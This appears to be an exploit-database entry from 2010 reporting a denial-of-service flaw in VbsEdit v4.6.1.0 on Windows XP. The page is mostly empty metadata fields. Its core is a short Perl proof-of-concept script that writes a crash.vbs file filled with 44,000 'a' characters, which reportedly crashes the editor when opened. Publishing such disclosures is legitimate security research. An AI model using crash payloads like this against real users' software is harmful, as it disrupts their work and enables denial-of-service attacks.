header-logo
Suggest Exploit
vendor:
VbsEdit
by:
C G Tan
N/A
CVSS
N/A
Denial of Service
N/A
CWE
Product Name: VbsEdit
Affected Version From: v4.6.1.0
Affected Version To: v4.6.1.0
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP 2, Windows XP SP 3
2010

VbsEdit v4.6.1.0 DoS

Opening crash.vbs in VbsEdit will cause VbsEdit to crash consistently.

Mitigation:

N/A
Source

Exploit-DB raw data:

# Exploit Title: VbsEdit v4.6.1.0 DoS
# Date: 8 / 12 / 2010
# Author: C G Tan
# Software Link: http://www.vbsedit.com/tr_download.asp
# Version: v4.6.1.0 32-bit Version
# Tested on: Windows XP SP 2, Windows XP SP 3
# CVE : N / A
# Description : This is the latest version from the official website.

#!/usr/bin/perl

#Opening crash.vbs in VbsEdit will cause VbsEdit to crash consistently.
 
open FILE, ">crash.vbs";
print FILE 'a'x44000;
close FILE;